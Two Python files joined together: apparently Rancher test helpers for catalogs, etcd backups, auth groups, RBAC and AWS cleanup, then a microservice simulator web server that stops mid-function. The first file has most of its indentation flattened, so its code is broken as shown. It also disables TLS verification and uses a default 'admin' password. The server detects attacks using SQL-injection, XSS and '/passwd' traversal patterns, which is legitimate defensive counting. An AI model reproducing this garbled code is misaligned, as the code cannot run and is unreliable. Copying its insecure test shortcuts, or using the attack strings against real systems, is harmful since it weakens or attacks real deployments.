def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
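    """Compose a catalog external ID for a global, cluster-scoped or
    project-scoped catalog template and version, e.g.
    catalog://?catalog=library&template=wordpress&version=1.0.1"""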
if catalog_type is None:
return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None, version=""):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
rpassword = 'admin'
print(auth_url)
if version.find("master") > -1 or version.find("2.6") > -1:
rpassword = ADMIN_PASSWORD
print("on 2.6 or later")
retries = 5
    for attempt in range(1, retries + 1):
try:
r = requests.post(auth_url, json={
'username': 'admin',
'password': rpassword,
'responseType': 'json',
}, verify=False)
except requests.exceptions.RequestException:
print("password request failed. Retry attempt: ",
"{} of {}".format(attempt, retries))
time.sleep(2)
else:
break
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
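    """Deploy a daemonSet and an ingress, trigger an etcd backup and
    verify the snapshot exists in S3 or on the etcd nodes' filesystem,
    depending on backup_mode; return the updated namespace and
    backup_info."""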
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
user_client = get_user_client()
cluster = user_client.reload(cluster)
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
        assert_message = "The backup shouldn't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
        :param skip: if True, skip the first char of the received message
        :param b64: if True, base64-decode the received payload before saving it
        """
        while socket.connected:
try:
data = socket.recv()
                # the message from kubectl contains an extra leading char
if skip:
data = data[1:]
if len(data) < 5:
                    continue
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
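# Typical pairing (editor's sketch, not from the original tests): WebsocketLogParse
# is normally driven together with create_connection() defined further below, e.g.
#   ws = create_connection(url, ["base64.channel.k8s.io"])
#   logparse = WebsocketLogParse()
#   logparse.start_thread(target=logparse.receiver, args=(ws, True))
#   ...
#   print(logparse.last_message)
# The subprotocol above is only an example; callers pass whatever their endpoint needs.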
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
    create a websocket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
prepare_hardened_nodes(
aws_nodes, profile, node_roles, client, cluster, True)
cluster = validate_cluster_state(client, cluster)
    # wait for the workloads under the System project to get active
time.sleep(20)
create_kubeconfig(cluster)
prepare_hardened_cluster('rke-cis-1.5', kube_fname)
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
    This method generates test cases from an input file and returns the result
    that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
    This method runs the given kubectl command with the service account's
    kubeconfig and validates that the result matches the expected
    authorization for the cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
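# How the two helpers above are meant to be combined (editor's sketch; the JSON
# path below is hypothetical):
#   @pytest.mark.parametrize(
#       "cluster_role,command,authorization,name",
#       rbac_test_file_reader(DATA_SUBDIR + "/rbac/rbac_v2.json"))
#   def test_rbac_v2(cluster_role, command, authorization, name):
#       validate_cluster_role_rbac(cluster_role, command, authorization, name)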
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Deployed")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app["metadata"]["name"] == app_name:
if app["status"]["summary"]["state"] == "deployed":
return app_list
app = client.list_catalog_cattle_io_app()
return
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
    list all installed apps and search for "app_name" in the list;
    if app_name is NOT in the list, the app has been uninstalled successfully
    :param client: cluster client for the user
    :param app_name: app which is being uninstalled
    :param timeout: time for the app to be uninstalled
"""
    start = time.time()
    response = client.list_catalog_cattle_io_app()
    while True:
        app_list = []
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to Uninstalled")
        time.sleep(.5)
        for app in response["data"]:
            app_list.append(app["metadata"]["name"])
        if app_name not in app_list:
            return app_list
        response = client.list_catalog_cattle_io_app()
def check_v2_app_and_uninstall(client, chart_name):
    response = client.list_catalog_cattle_io_app()
    for app in response["data"]:
        if app["metadata"]["name"] == chart_name:
            client.action(obj=app, action_name="uninstall")
            app_list = wait_until_app_v2_uninstall(client, chart_name)
            assert chart_name not in app_list, \
                "App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
def prepare_hardened_nodes(aws_nodes, profile, node_roles,
client=None, cluster=None, custom_cluster=False):
i = 0
conf_file = DATA_SUBDIR + "/sysctl-config"
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
file1 = open(conf_file, 'r')
while True:
line = file1.readline()
if not line:
break
aws_node.execute_command(line.strip())
if "etcd" in node_roles[i]:
aws_node.execute_command("sudo useradd etcd")
if custom_cluster:
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
file1 = open(conf_file, 'r')
while True:
line = file1.readline()
if not line:
break
aws_node.execute_command(line.strip())
if "etcd" in node_roles[i]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
if custom_cluster:
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
file1.close()
return aws_nodes
def prepare_hardened_cluster(profile, kubeconfig_path):
if profile == 'rke-cis-1.5':
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A",
kubeconfig=kubeconfig_path)["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns),
kubeconfig=kubeconfig_path)
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file),
kubeconfig=kubeconfig_path)
def print_kubeconfig(kpath):
kubeconfig_file = open(kpath, "r")
kubeconfig_contents = kubeconfig_file.read()
kubeconfig_file.close()
kubeconfig_contents_encoded = base64.b64encode(
kubeconfig_contents.encode("utf-8")).decode("utf-8")
print("\n\n" + kubeconfig_contents + "\n\n")
print("\nBase64 encoded: \n\n" + kubeconfig_contents_encoded + "\n\n")
|
microsimserver.py
|
#!/usr/local/bin/python3
import sys
import os
import socket
import time
import random
import string
import re
import json
import threading
import urllib.parse
from socketserver import ThreadingMixIn
from statsd import StatsClient
from http.server import BaseHTTPRequestHandler, HTTPServer
def str2bool(val):
if val and val.lower() != 'false':
return bool(val)
return False
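# Editor's note on str2bool(): any non-empty value other than the literal string
# "false" (case-insensitive) is treated as truthy, e.g.
#   str2bool("true")  -> True
#   str2bool("0")     -> True   (non-empty and not "false")
#   str2bool("false") -> False
#   str2bool(None)    -> False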
LISTEN_PORT = int(os.getenv('LISTEN_PORT', 8080))
STATS_PORT = os.getenv('STATS_PORT', None)
STATSD_HOST = os.getenv('STATSD_HOST', None)
STATSD_PORT = int(os.getenv('STATSD_PORT', 8125))
RESPOND_BYTES = int(os.getenv('RESPOND_BYTES', 16384))
STOP_SECONDS = int(os.getenv('STOP_SECONDS', 0))
STOP_PADDING = str2bool(os.getenv('STOP_PADDING', False))
START_TIME = int(time.time())
HOST_NAME = ''
padding = 0
if STOP_SECONDS and STOP_PADDING:
padding = random.choice(range(STOP_SECONDS))
stats = {
'Total': {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
},
'Last 30 Seconds': {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
}
}
if STATSD_HOST:
server_stats = StatsClient(prefix='all_servers',
host=STATSD_HOST,
port=STATSD_PORT)
host_stats = StatsClient(prefix='server-' + socket.gethostname(),
host=STATSD_HOST,
port=STATSD_PORT)
lock = threading.Lock()
def keep_running():
if (STOP_SECONDS != 0) and ((START_TIME + STOP_SECONDS + padding) < int(time.time())):
sys.exit('Server killed after ' + str(int(STOP_SECONDS) + int(padding)) + ' seconds.')
return True
def insert_data():
return ''.join([random.choice(string.ascii_letters + string.digits) for n in range(RESPOND_BYTES)])
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
pass
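# Editor's note: `state` below just remembers when statistics were last flushed;
# every_30_seconds() returns True at most once per 30-second window, guarded by
# the module-wide lock so concurrent request threads cannot double-flush.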
class state():
last_timestamp = START_TIME
def every_30_seconds():
with lock:
if state.last_timestamp + 30 > int(time.time()):
return False
state.last_timestamp = int(time.time())
return True
class httpd(BaseHTTPRequestHandler):
server_name = socket.gethostname()
server_ip = socket.gethostbyname(server_name)
def do_GET(self):
"""simple http response"""
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
data = insert_data() + '\n'
info = time.asctime() + ' hostname: ' + self.server_name + ' ip: ' + self.server_ip + ' remote: ' + self.address_string() + ' hostheader: ' + str(host_header) + ' path: ' + self.path + '\n'
body = data + info
self.wfile.write(body.encode('utf-8'))
with lock:
stats['Total']['Requests'] += 1
stats['Total']['Sent Bytes'] += len(body)
stats['Last 30 Seconds']['Requests'] += 1
stats['Last 30 Seconds']['Sent Bytes'] += len(body)
if STATSD_HOST:
server_stats.incr('requests')
server_stats.incr('sent_bytes', len(body))
host_stats.incr('requests')
host_stats.incr('sent_bytes', len(body))
if re.search('UNION SELECT', urllib.parse.unquote_plus(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' SQLi attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['SQLi'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['SQLi'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('sqli')
host_stats.incr('attacks')
host_stats.incr('sqli')
if re.search('<script>alert', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' XSS attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['XSS'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['XSS'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('xss')
host_stats.incr('attacks')
host_stats.incr('xss')
if re.search('../../../../../passwd', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' Directory Traversal attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['Directory Traversal'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['Directory Traversal'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('directory_traversal')
